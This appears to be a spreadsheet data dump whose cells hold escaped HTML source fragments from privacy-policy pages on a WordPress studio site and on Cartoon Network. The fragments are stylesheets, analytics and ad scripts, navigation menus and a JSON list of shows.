solid;padding-left:0;padding-right:1em}.wp-block-quote.has-text-align-center{border:none;padding-left:0}.wp-block-quote.is-large,.wp-block-quote.is-style-large,.wp-block-quote.is-style-plain{border:none}.wp-block-search .wp-block-search__label{font-weight:700}.wp-block-search__button{border:1px solid #ccc;padding:.375em .625em}:where(.wp-block-group.has-background){padding:1.25em 2.375em}.wp-block-separator.has-css-opacity{opacity:.4}.wp-block-separator{border:none;border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){border-bottom:none;height:1px}.wp-block-separator.has-background:not(.is-style-wide):not(.is-style-dots){height:2px}.wp-block-table{margin:0 0 1em}.wp-block-table td,.wp-block-table th{word-break:normal}.wp-block-table figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-table figcaption{color:hsla(0,0%,100%,.65)}.wp-block-video figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-video figcaption{color:hsla(0,0%,100%,.65)}.wp-block-video{margin:0 0 1em}.wp-block-template-part.has-background{margin-bottom:0;margin-top:0;padding:1.25em 2.375em}
&lt;/style&gt;
&lt;link rel='stylesheet' id='classic-theme-styles-css' href='http://www.vivastudios.com/wp-includes/css/classic-themes.min.css?ver=6.2'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t>
  </si>
  <si>
    <t>important;}
.wp-block-navigation a:where(:not(.wp-element-button)){color: inherit;}
:where(.wp-block-columns.is-layout-flex){gap: 2em;}
.wp-block-pullquote{font-size: 1.5em;line-height: 1.6;}
&lt;/style&gt;
&lt;link rel='stylesheet' id='contact-form-7-css' href='http://www.vivastudios.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.4.1' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='cookie-law-info-css' href='http://www.vivastudios.com/wp-content/plugins/cookie-law-info/public/css/cookie-law-info-public.css?ver=2.0.4' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='cookie-law-info-gdpr-css' href='http://www.vivastudios.com/wp-content/plugins/cookie-law-info/public/css/cookie-law-info-gdpr.css?ver=2.0.4' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='zakra-style-css' href='http://www.vivastudios.com/wp-content/themes/zakra/style.css?ver=6.2' type='text/css' media='all' /&gt;
&lt;style id='zakra-style-inline-css' type='text/css'&gt;
@media (min-width: 1200px) {.tg-container{max-width: 1500px;}}
body{font-family: Nunito;font-size: 15px;line-height: 1.8;font-weight: 400;font-style: normal;}h1, h2, h3, h4, h5, h6{font-family: Nunito;line-height: 1.3;font-weight: 400;font-style: normal;}
.site-branding .site-title{font-family: -apple-system, blinkmacsystemfont, segoe ui, roboto, oxygen-sans, ubuntu, cantarell, helvetica neue, helvetica, arial, sans-serif;font-size: 15;line-height: 1.5;font-weight: 400;font-style: normal;}
&lt;/style&gt;
&lt;link rel='stylesheet' id='zakra_child_style-css' href='http://www.vivastudios.com/wp-content/themes/zakra-child/style.css?ver=1.0' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='font-awesome-css' href='http://www.vivastudios.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/font-awesome.min.css?ver=4.7.0' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='zakra-googlefonts-css' href='//fonts.googleapis.com/css?family=Nunito%3A400%7CNunito%3A400&amp;#038;ver=6.2' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='elementor-icons-css' href='http://www.vivastudios.com/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?ver=5.11.0' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='elementor-frontend-css' href='http://www.vivastudios.com/wp-content/plugins/elementor/assets/css/frontend.min.css?ver=3.3.0' type='text/css' media='all' /&gt;
&lt;style id='elementor-frontend-inline-css' type='text/css'&gt;
@font-face{font-family:eicons;src:url(http://www.vivastudios.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.eot?5.10.0);src:url(http://www.vivastudios.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.eot?5.10.0#iefix) format("embedded-opentype"),url(http://www.vivastudios.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff2?5.10.0) format("woff2"),url(http://www.vivastudios.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff?5.10.0) format("woff"),url(http://www.vivastudios.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.ttf?5.10.0) format("truetype"),url(http://www.vivastudios.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.svg?5.10.0#eicon) format("svg");font-weight:400;font-style:normal}
&lt;/style&gt;
&lt;link rel='stylesheet' id='elementor-post-2716-css' href='http://www.vivastudios.com/wp-content/uploads/elementor/css/post-2716.css?ver=1626109233' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='elementor-pro-css' href='http://www.vivastudios.com/wp-content/plugins/elementor-pro/assets/css/frontend.min.css?ver=3.3.2' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='font-awesome-5-all-css' href='http://www.vivastudios.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/all.min.css?ver=3.3.0' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='font-awesome-4-shim-css' href='http://www.vivastudios.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/v4-shims.min.css?ver=3.3.0' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='elementor-post-2721-css' href='http://www.vivastudios.com/wp-content/uploads/elementor/css/post-2721.css?ver=1676299125' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='ms-main-css' href='http://www.vivastudios.com/wp-content/plugins/masterslider/public/assets/css/masterslider.main.css?ver=3.5.0' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='ms-custom-css' href='http://www.vivastudios.com/wp-content/uploads/masterslider/custom.css?ver=17.3' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='viva_style-css' href='http://www.vivastudios.com/wp-content/themes/zakra-child/assets/css/viva-style.css?ver=6.2' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='google-fonts-1-css' href='https://fonts.googleapis.com/css?family=Roboto%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic%7CRoboto+Slab%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic&amp;#038;display=optional&amp;#038;ver=6.2' type='text/css' media='all' /&gt;
&lt;script type='text/javascript' src='http://www.vivastudios.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.3' id='jquery-core-js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='http://www.vivastudios.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.0' id='jquery-migrate-js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='http://www.vivastudios.com/wp-content/plugins/masterslider/includes/modules/elementor/assets/js/elementor-widgets.js?ver=3.5.0' id='masterslider-elementor-widgets-js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' id='cookie-law-info-js-extra'&gt;
/* &lt;! [CDATA[ */
var Cli_Data = {"nn_cookie_ids":[],"cookielist":[],"non_necessary_cookies":[],"ccpaEnabled":"","ccpaRegionBased":"","ccpaBarEnabled":"","strictlyEnabled":["necessary","obligatoire"],"ccpaType":"gdpr","js_blocking":"1","custom_integration":"","triggerDomRefresh":"","secure_cookies":""};
var cli_cookiebar_settings = {"animate_speed_hide":"500","animate_speed_show":"500","background":"#FFF","border":"#b1a6a6c2","border_on":"","button_1_button_colour":"#61a229","button_1_button_hover":"#4e8221","button_1_link_colour":"#fff","button_1_as_button":"1","button_1_new_win":"","button_2_button_colour":"#333","button_2_button_hover":"#292929","button_2_link_colour":"#444","button_2_as_button":"","button_2_hidebar":"","button_3_button_colour":"#dedfe0","button_3_button_hover":"#b2b2b3","button_3_link_colour":"#333333","button_3_as_button":"1","button_3_new_win":"","button_4_button_colour":"#dedfe0","button_4_button_hover":"#b2b2b3","button_4_link_colour":"#333333","button_4_as_button":"1","button_7_button_colour":"#61a229","button_7_button_hover":"#4e8221","button_7_link_colour":"#fff","button_7_as_button":"1","button_7_new_win":"","font_family":"inherit","header_fix":"","notify_animate_hide":"1","notify_animate_show":"","notify_div_id":"#cookie-law-info-bar","notify_position_horizontal":"right","notify_position_vertical":"bottom","scroll_close":"","scroll_close_reload":"","accept_close_reload":"","reject_close_reload":"","showagain_tab":"","showagain_background":"#fff","showagain_border":"#000","showagain_div_id":"#cookie-law-info-again","showagain_x_position":"100px","text":"#333333","show_once_yn":"","show_once":"10000","logging_on":"","as_popup":"","popup_overlay":"1","bar_heading_text":"","cookie_bar_as":"banner","popup_showagain_position":"bottom-right","widget_position":"left"};
var log_object = {"ajax_url":"https:\/\/www.vivastudios.com\/wp-admin\/admin-ajax.php"};
/* ]]&gt; */
&lt;/script&gt;
&lt;script type='text/javascript' src='http://www.vivastudios.com/wp-content/plugins/cookie-law-info/public/js/cookie-law-info-public.js?ver=2.0.4' id='cookie-law-info-js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='http://www.vivastudios.com/wp-content/plugins/elementor/assets/lib/font-awesome/js/v4-shims.min.js?ver=3.3.0' id='font-awesome-4-shim-js'&gt;&lt;/script&gt;
&lt;link rel="https://api.w.org/" href="https://www.vivastudios.com/wp-json/" /&gt;&lt;link rel="alternate" type="application/json" href="https://www.vivastudios.com/wp-json/wp/v2/pages/2721" /&gt;&lt;link</t>
  </si>
  <si>
    <t>rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.vivastudios.com/xmlrpc.php?rsd" /&gt;
&lt;link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.vivastudios.com/wp-includes/wlwmanifest.xml" /&gt;
&lt;meta name="generator" content="WordPress 6.2" /&gt;
&lt;link rel='shortlink' href='https://www.vivastudios.com/?p=2721' /&gt;
&lt;link rel="alternate" type="application/json+oembed" href="https://www.vivastudios.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.vivastudios.com%2Fprivacy-policy%2F" /&gt;
&lt;link rel="alternate" type="text/xml+oembed" href="https://www.vivastudios.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.vivastudios.com%2Fprivacy-policy%2F&amp;#038;format=xml" /&gt;
&lt;meta name="generator" content="Site Kit by Google 1.88.0" /&gt;&lt;script&gt;var ms_grabbing_curosr='http://www.vivastudios.com/wp-content/plugins/masterslider/public/assets/css/common/grabbing.cur',ms_grab_curosr='http://www.vivastudios.com/wp-content/plugins/masterslider/public/assets/css/common/grab.cur';&lt;/script&gt;
&lt;meta name="generator" content="MasterSlider 3.5.0 - Responsive Touch Image Slider" /&gt;
		&lt;style id="background-color-css"&gt;_x005F_x000D_
			body.custom-background #page { background-color: # }_x005F_x000D_
		&lt;/style&gt;_x005F_x000D_
&lt;!-- Fragmento de código de Google Adsense añadido por Site Kit --&gt;
&lt;meta name="google-adsense-platform-account" content="ca-host-pub-2644536267352236"&gt;
&lt;meta name="google-adsense-platform-domain" content="sitekit.withgoogle.com"&gt;
&lt;!-- Final del fragmento de código de Google Adsense añadido por Site Kit --&gt;
		&lt;style type="text/css"&gt;_x005F_x000D_
						.site-title,_x005F_x000D_
			.site-description {_x005F_x000D_
				position: absolute;_x005F_x000D_
				clip: rect(1px, 1px, 1px, 1px);_x005F_x000D_
			}_x005F_x000D_
_x005F_x000D_
					&lt;/style&gt;_x005F_x000D_
&lt;!--</t>
  </si>
  <si>
    <t>Fragmento de código de Google Adsense añadido por Site Kit --&gt;
&lt;script async="async" src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-6241145672600332" crossorigin="anonymous" type="text/javascript"&gt;&lt;/script&gt;
&lt;!-- Final del fragmento de código de Google Adsense añadido por Site Kit --&gt;
&lt;link rel="icon" href="https://www.vivastudios.com/wp-content/uploads/2021/06/FaviconVIVA_Mesa-de-trabajo-1.svg" sizes="32x32" /&gt;
&lt;link rel="icon" href="https://www.vivastudios.com/wp-content/uploads/2021/06/FaviconVIVA_Mesa-de-trabajo-1.svg" sizes="192x192" /&gt;
&lt;link rel="apple-touch-icon" href="https://www.vivastudios.com/wp-content/uploads/2021/06/FaviconVIVA_Mesa-de-trabajo-1.svg" /&gt;
&lt;meta name="msapplication-TileImage" content="https://www.vivastudios.com/wp-content/uploads/2021/06/FaviconVIVA_Mesa-de-trabajo-1.svg" /&gt;
		&lt;style type="text/css" id="wp-custom-css"&gt;
			.page.hentry .entry-header h1.entry-title {
	display: none;
}		&lt;/style&gt;
		_x005F_x000D_
	&lt;/head&gt;_x005F_x000D_
_ x000D_
&lt;body class="page-template page-template-elementor_theme page page-id-2721 wp-custom-logo _masterslider _</t>
  </si>
  <si>
    <t>msp_version_3.5.0 tg-site-layout--stretched tg-container--wide elementor-default elementor-kit-2716 elementor-page elementor-page-2721"&gt;_x005F_x000D_
_x005F_x000D_
&lt;svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;" &gt;&lt;defs&gt;&lt;filter id="wp-duotone-dark-grayscale"&gt;&lt;feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299</t>
  </si>
  <si>
    <t>type="table" tableValues="1 1" /&gt;&lt;/feComponentTransfer&gt;&lt;feComposite in2="SourceGraphic" operator="in" /&gt;&lt;/filter&gt;&lt;/defs&gt;&lt;/svg&gt;&lt;svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 0 0" width="0" height="0" focusable="false"</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;html lang="en"&gt;
&lt;head&gt;
&lt;meta charset="utf-8" /&gt;
&lt;script&gt;window. NREUM||(NREUM={});NREUM.info={"beacon":"bam.eu01.nr-data.net","errorBeacon":"bam.eu01.nr-data.net","licenseKey":"NRJS-b16ef269fd11602a41e","applicationID":"221357536","transactionName":"JhpeRQoXX1kDF0sCVgsBVV8MV0BdCRI=","queueTime":0,"applicationTime":171,"agent":""}&lt;/script&gt;
&lt;script&gt;(window. NREUM||(NREUM={})).init={privacy:{cookies_enabled:true},ajax:{deny_list:["bam.eu01.nr-data.net"]},distributed_tracing:{enabled:true}};(window.</t>
  </si>
  <si>
    <t xml:space="preserve">     
&lt;!DOCTYPE html&gt;
&lt;html class="no-js" lang="en"&gt;
  &lt;head&gt;
    &lt;meta name="viewport" content="width=device-width, initial-scale = 1.0" /&gt;
&lt;meta http-equiv="X-UA-Compatible" content="IE=edge"&gt;
&lt;meta charset="utf-8" /&gt;
&lt;meta http-equiv="PICS-Label" content='(pics-1.1 "http://www.classify.org/safesurf/" l r (ss~~000 1))' /&gt;
	&lt;title&gt;Privacy Policy | Cartoon Network&lt;/title&gt;
	&lt;meta name="keywords" content=""/&gt;
	&lt;meta name="description" content=""/&gt;
	&lt;link rel="canonical" href="https://www.cartoonnetwork.com/legal/privacy.html"/&gt;
    &lt;link href="//cdn.fonts.net/kit/1d40b190-4262-11ec-9aa3-06f7e389c91a/1d40b190-4262-11ec-9aa3-06f7e389c91a.css" rel="stylesheet" /&gt;
&lt;link rel="stylesheet" type="text/css" href="/static/css/global.css"&gt;
    &lt;link href="/static/css/legal.css" rel="stylesheet" type="text/css" /&gt;
    &lt;link
      href="/static/css/universal-nav.css"
      rel="stylesheet"
      type="text/css"
    /&gt;
&lt;script type="text/javascript" src="/static/js/modernizr.min.js"&gt;&lt;/script&gt;
&lt;script type="text/javascript" src="/static/js/jquery.min.js"&gt;&lt;/script&gt;
&lt;script type="text/javascript" src="/static/js/jquery.md5.js"&gt;&lt;/script&gt;
&lt;script type="text/javascript" src="/static/js/js.cookie.js"&gt;&lt;/script&gt;
&lt;script type="text/javascript" src="/static/js/json2.js"&gt;&lt;/script&gt;
&lt;script type="text/javascript" src="https://i.cdn.turner.com/ads/adfuel/ais/3.0/toon-ais.js"&gt;&lt;/script&gt;
&lt;script type="text/javascript" src="https://i.cdn.turner.com/ads/adfuel/adfuel-3.0.25-cc.min.js"&gt;&lt;/script&gt;
&lt;script type="text/javascript" src="/static/js/cn-global.js"&gt;&lt;/script&gt;
&lt;script type="text/javascript"&gt;
	// metadata for the Ensighten object
	// only set it to the default data if it doesn't already exist
	if (typeof turner_metadata == "undefined") {
		var turner_metadata = {
			template_type: "adbp:misc",
			content_type: "adbp:none"
		}
	}
	// Java variables we need to pass to JavaScript
	_cnglobal.isProduction = true;
	_cnglobal.videoConfigInfo = 6.0;
	_cnglobal.cmsApiUrl = "https://cms-api.cartoonnetwork.com";
&lt;/script&gt;
&lt;script type="text/javascript" src="//lightning.cartoonnetwork.com/launch/7be62238e4c3/efb435d2b47e/launch-7e5f1da6710d.min.js"&gt;&lt;/script&gt;
&lt;script type="application/ld+json"&gt;
	{
		"@context": "http://schema.org",
		"@type": "Organization",
		"@id": "https://www.cartoonnetwork.com",
		"name": "Cartoon Network",
		"url": "https://www.cartoonnetwork.com",
		"logo": "",
		"contactPoint": {
			"@type": "ContactPoint",
			"contactType": "customer service",
			"name": "Cartoon Network Support",
			"areaServed": "US",
			"url": "https://cartoonnetwork.zendesk.com",
			"availableLanguage": ["English","Spanish"]
		},
		"sameAs": []
	}
&lt;/script&gt;
    &lt;script type="text/javascript" src="/static/js/TweenMax.min.js"&gt;&lt;/script&gt;
&lt;script type="text/javascript" src="/static/js/ScrollToPlugin.min.js"&gt;&lt;/script&gt;
&lt;script type="text/javascript" src="/static/js/EasePack.min.js"&gt;&lt;/script&gt;
&lt;script type="text/javascript" src="/static/js/jquery.mousewheel.js"&gt;&lt;/script&gt;
&lt;script type="text/javascript" src="/static/js/universal-nav.js"&gt;&lt;/script&gt;
  &lt;/head&gt;
  &lt;body&gt;
&lt;div id="nav-bar" class="universalNav"&gt;
  &lt;div id="shadow-container" class="shadow"&gt;
    &lt;div id="nav-bar-bg"&gt;
      &lt;div id="nav-bar-container" class="clearfix small-nav"&gt;&lt;a id="nav-bar-cn-logo" href="/index.html?atclk_gn=un_homeImg"&gt;&lt;img src="/static/images/nav-bar/cnlogo-icon-inv.png" alt='Cartoon Network'&gt;&lt;/a&gt;
        &lt;a id="nav-bar-cn-text" href="/index.html?atclk_gn=un_homeImg"&gt;cartoon network&lt;/a&gt;
        &lt;div class="_nav-bar-dividers _nav-bar-buttons-dividers"&gt;&lt;/div&gt;
        &lt;div id="nav-bar-button-games" class="_nav-bar-buttons"&gt; &lt;a href="/games/index.html?atclk_gn=un_games" class="_nav-bar-button-text"&gt;games &lt;span class="cn_symbols"&gt;v&lt;/span&gt;&lt;/a&gt;
          &lt;div id="nav-bar-flyout-games" class="_nav-bar-flyout shadow"&gt;
            &lt;div class="_nav-bar-flyout-container"&gt;
                &lt;a class="character-heads nth-1" href="/games/teen-titans-go/index.html?atclk_gn=un_games_teen-titans-go"&gt;
                  &lt;img class="character-heads-property-image" src="https://i.cartoonnetwork.com/prismo/props/chars/ttg_robin_180x180.png"&gt;
                  &lt;div class="character-heads-property-title"&gt;Teen Titans Go!&lt;/div&gt;
                &lt;/a&gt;
                &lt;a class="character-heads nth-2" href="/games/gumball/index.html?atclk_gn=un_games_gumball"&gt;
                  &lt;img class="character-heads-property-image" src="https://i.cartoonnetwork.com/prismo/props/chars/gumball_gumball_180x180.png"&gt;
                  &lt;div class="character-heads-property-title"&gt;The Amazing World of Gumball&lt;/div&gt;
                &lt;/a&gt;
                &lt;a class="character-heads nth-3" href="/games/ben-10/index.html?atclk_gn=un_games_ben-10"&gt;
                  &lt;img class="character-heads-property-image" src="https://i.cartoonnetwork.com/prismo/props/chars/ben17_180x180_0.png"&gt;
                  &lt;div class="character-heads-property-title"&gt;Ben 10&lt;/div&gt;
                &lt;/a&gt;
                &lt;a class="character-heads nth-4" href="/games/steven-universe/index.html?atclk_gn=un_games_steven-universe"&gt;
                  &lt;img class="character-heads-property-image" src="https://i.cartoonnetwork.com/prismo/props/chars/steven_steven_180x180.png"&gt;
                  &lt;div class="character-heads-property-title"&gt;Steven Universe&lt;/div&gt;
                &lt;/a&gt;
                &lt;a class="character-heads nth-5" href="/games/we-bare-bears/index.html?atclk_gn=un_games_we-bare-bears"&gt;
                  &lt;img class="character-heads-property-image" src="https://i.cartoonnetwork.com/prismo/props/chars/icebear_180x180_v2.png"&gt;
                  &lt;div class="character-heads-property-title"&gt;We Bare Bears&lt;/div&gt;
                &lt;/a&gt;
            &lt;/div&gt;
            &lt;a class="_nav-bar-flyout-cta" href="/games/index.html?atclk_gn=un_games_see-all-games"&gt;
              &lt;div class="_nav-bar-flyout-cta-icon cn_symbols"&gt;&lt;/div&gt;
              &lt;div class="_nav-bar-flyout-cta-text"&gt;see all games&lt;/div&gt;
              &lt;div class="_nav-bar-flyout-cta-arrow cn_symbols"&gt;z&lt;/div&gt;
            &lt;/a&gt;
          &lt;/div&gt;
        &lt;/div&gt;
        &lt;div id="nav-bar-button-video" class="_nav-bar-buttons"&gt; &lt;a href="/video/index.html?atclk_gn=un_video" class="_nav-bar-button-text"&gt;video &lt;span class="cn_symbols"&gt;v&lt;/span&gt;&lt;/a&gt;
          &lt;div id="nav-bar-flyout-video" class="_nav-bar-flyout shadow"&gt;
            &lt;div class="_nav-bar-flyout-container"&gt;
              	&lt;a class="character-heads nth-1" href="/video/teen-titans-go/index.html?atclk_gn=un_video_teen-titans-go"&gt; 
                  &lt;img class="character-heads-property-image" src="https://i.cartoonnetwork.com/prismo/props/chars/ttg_robin_180x180.png"&gt;
                  &lt;div class="character-heads-property-title"&gt;Teen Titans Go!&lt;/div&gt;
                &lt;/a&gt;
              	 &lt;a class="character-heads nth-2" href="/video/craig-of-the-creek/index.html?atclk_gn=un_video_craig-of-the-creek"&gt; 
                  &lt;img class="character-heads-property-image" src="https://i.cartoonnetwork.com/prismo/props/chars/cotc_video_brand_drawer_180x180.png"&gt;
                  &lt;div class="character-heads-property-title"&gt;Craig of the Creek&lt;/div&gt;
                &lt;/a&gt;
              	&lt;a class="character-heads nth-3" href="/video/cartoonito/index.html?atclk_gn=un_video_Cartoonito"&gt; 
                  &lt;img class="character-heads-property-image" src="https://i.cartoonnetwork.com/prismo/props/chars/Cartoonito_VideoBrandDrawer_180x180.png"&gt;
                  &lt;div class="character-heads-property-title"&gt;Cartoonito&lt;/div&gt;
                &lt;/a&gt;
              	&lt;a class="character-heads nth-4" href="/video/gumball/index.html?atclk_gn=un_video_gumball"&gt; 
                  &lt;img class="character-heads-property-image" src="https://i.cartoonnetwork.com/prismo/props/chars/gumball_gumball_180x180.png"&gt;
                  &lt;div class="character-heads-property-title"&gt;The</t>
  </si>
  <si>
    <t>Amazing World of Gumball&lt;/div&gt;
                &lt;/a&gt;
              	&lt;a class="character-heads nth-5" href="https://www.cartoonnetwork.com/video/unlocked/index.html?atclk_gn=un_video_unlocked"&gt; 
                  &lt;img class="character-heads-property-image" src="https://i.cartoonnetwork.com/prismo/props/chars/150x150_unlocked_videodrawer.png"&gt;
                  &lt;div class="character-heads-property-title"&gt;Unlocked Full Episodes&lt;/div&gt;
                &lt;/a&gt;
            &lt;/div&gt;
            &lt;a class="_nav-bar-flyout-cta" href="/video/index.html?atclk_gn=un_video_see-all-video"&gt;
              &lt;div class="_nav-bar-flyout-cta-icon cn_symbols"&gt;&lt;/div&gt;
              &lt;div class="_nav-bar-flyout-cta-text"&gt;see all video&lt;/div&gt;
              &lt;div class="_nav-bar-flyout-cta-arrow cn_symbols"&gt;z&lt;/div&gt;
            &lt;/a&gt;
           &lt;/div&gt;
        &lt;/div&gt;
        &lt;div class="_nav-bar-dividers _nav-bar-buttons-dividers"&gt;&lt;/div&gt;
        &lt;div id="nav-bar-button-apps" class="_nav-bar-buttons"&gt;&lt;a href="/mobile/index.html?atclk_gn=un_apps" class="_nav-bar-button-text"&gt;apps&lt;/a&gt;&lt;/div&gt;
        &lt;div class="_nav-bar-dividers _nav-bar-buttons-dividers"&gt;&lt;/div&gt;
        &lt;!-- &lt;div id="nav-bar-button-shop" class="_nav-bar-buttons"&gt;&lt;a href="/redirects/shop/index.html?atclk_gn=un_shop&amp;url=https://www.cartoonnetworkshop.com/?ref=CNHEADER" class="_nav-bar-button-text"&gt;SHOP&lt;/a&gt;&lt;/div&gt; --&gt;
        &lt;div class="_nav-bar-desktop-items"&gt; 
          &lt;form id="nav-bar-icon-search" class="_nav-bar-icons" type="submit"&gt;
            &lt;input id="nav-bar-icon-searchBox" name="keywords" type="text" value="SEARCH" autocomplete="off" aria-label="SEARCH"&gt;
            &lt;input id="nav-bar-icon-search-icon" type="submit" value="" aria-label="SEARCH"&gt;&lt;/a&gt;
            &lt;div id="searchDropdown" class="hidden"&gt;
            &lt;/div&gt;
          &lt;/form&gt;
        &lt;/div&gt;
      &lt;/div&gt;
    &lt;/div&gt;
  &lt;/div&gt;
&lt;/div&gt;
    &lt;script type="text/javascript"&gt;
        _</t>
  </si>
  <si>
    <t>cnglobal.searchData = apiObjArrayToValidObjArray([{"id":2,"title":"teen-titans-go","display_title":"Teen Titans Go!","short_title":"Teen Titans Go!","video_index_start_date":"2018-05-01T04:00:00","video_index_end_date":"2049-05-01T05:00:00","game_index_start_date":"2018-02-12T18:55:00","game_index_end_date":"2050-02-12T05:00:00","videoIndexCanonicalUrl":"/video/teen-titans-go/index.html","gameIndexCanonicalUrl":"/games/teen-titans-go/index.html","search_thumbnail":"https://i.cartoonnetwork.com/prismo/props/chars/ttg_robin_180x180.png"},{"id":3,"title":"ben-10","display_title":"Ben 10","short_title":"Ben 10","video_index_start_date":"2018-05-01T04:00:00","video_index_end_date":"2049-04-30T05:00:00","game_index_start_date":"2018-02-12T05:00:00","game_index_end_date":"2050-02-12T05:00:00","videoIndexCanonicalUrl":"/video/ben-10/index.html","gameIndexCanonicalUrl":"/games/ben-10/index.html","search_thumbnail":"https://i.cartoonnetwork.com/prismo/props/chars/ben17_180x180_0.png"},{"id":4,"title":"gumball","display_title":"The Amazing World of Gumball","short_title":"Gumball","video_index_start_date":"2018-05-01T04:00:00","video_index_end_date":"2049-05-01T05:00:00","game_index_start_date":"2018-02-12T05:00:00","game_index_end_date":"2050-02-12T05:00:00","videoIndexCanonicalUrl":"/video/gumball/index.html","gameIndexCanonicalUrl":"/games/gumball/index.html","search_thumbnail":"https://i.cartoonnetwork.com/prismo/props/chars/gumball_gumball_180x180.png"},{"id":5,"title":"we-bare-bears","display_title":"We Bare Bears","short_title":"We Bare Bears","video_index_start_date":"2018-04-16T14:00:00","video_index_end_date":"2050-04-16T15:00:00","game_index_start_date":"2018-02-12T05:00:00","game_index_end_date":"2050-02-12T05:00:00","videoIndexCanonicalUrl":"/video/we-bare-bears/index.html","gameIndexCanonicalUrl":"/games/we-bare-bears/index.html","search_thumbnail":"https://i.cartoonnetwork.com/prismo/props/chars/icebear_180x180_v2.png"},{"id":6,"title":"steven-universe","display_title":"Steven Universe","short_title":"Steven Universe","video_index_start_date":"2018-04-19T14:00:00","video_index_end_date":"2050-04-19T15:00:00","game_index_start_date":"2018-02-12T05:00:00","game_index_end_date":"2050-02-12T05:00:00","videoIndexCanonicalUrl":"/video/steven-universe/index.html","gameIndexCanonicalUrl":"/games/steven-universe/index.html","search_thumbnail":"https://i.cartoonnetwork.com/prismo/props/chars/steven_steven_180x180.png"},{"id":8,"title":"unikitty","display_title":"Unikitty","short_title":"Unikitty","video_index_start_date":"2018-05-01T04:00:00","video_index_end_date":"2049-05-01T05:00:00","game_index_start_date":"2020-05-11T11:30:00","game_index_end_date":"2021-02-12T19:28:09","videoIndexCanonicalUrl":"/video/unikitty/index.html","gameIndexCanonicalUrl":null,"search_thumbnail":"https://i.cartoonnetwork.com/prismo/props/chars/Unikitty_Character_180x180.png"},{"id":9,"title":"clarence","display_title":"Clarence","short_title":"Clarence","video_index_start_date":"2018-04-30T04:00:00","video_index_end_date":"2049-05-01T05:00:00","game_index_start_date":"2018-02-12T05:00:00","game_index_end_date":"2050-02-12T05:00:00","videoIndexCanonicalUrl":"/video/clarence/index.html","gameIndexCanonicalUrl":"/games/clarence/index.html","search_thumbnail":"https://i.cartoonnetwork.com/prismo/props/chars/clarence_clarence_180x180.png"},{"id":10,"title":"powerpuff-girls","display_title":"The Powerpuff Girls","short_title":"Powerpuff Girls","video_index_start_date":"2018-05-03T14:00:00","video_index_end_date":"2050-05-04T03:00:00","game_index_start_date":"2018-02-12T05:00:00","game_index_end_date":"2050-02-12T05:00:00","videoIndexCanonicalUrl":"/video/powerpuff-girls/index.html","gameIndexCanonicalUrl":"/games/powerpuff-girls/index.html","search_thumbnail":"https://i.cartoonnetwork.com/prismo/props/chars/ppg_videobranddrawer_bubbles_180x180.png"},{"id":12,"title":"ninjago-spinjitzu","display_title":"NinjaGo: Masters of Spinjitzu","short_title":"NinjaGo: Masters of Spinjitzu","video_index_start_date":"2018-05-03T14:00:00","video_index_end_date":"2050-05-03T05:00:00","game_index_start_date":"2018-02-12T05:00:00","game_index_end_date":"2020-12-07T21:00:00","videoIndexCanonicalUrl":"/video/ninjago-spinjitzu/index.html","gameIndexCanonicalUrl":null,"search_thumbnail":"https://i.cartoonnetwork.com/prismo/props/chars/ninjago_video_brand_drawer_180x180.png"},{"id":13,"title":"adventure-time","display_title":"Adventure Time","short_title":"Adventure 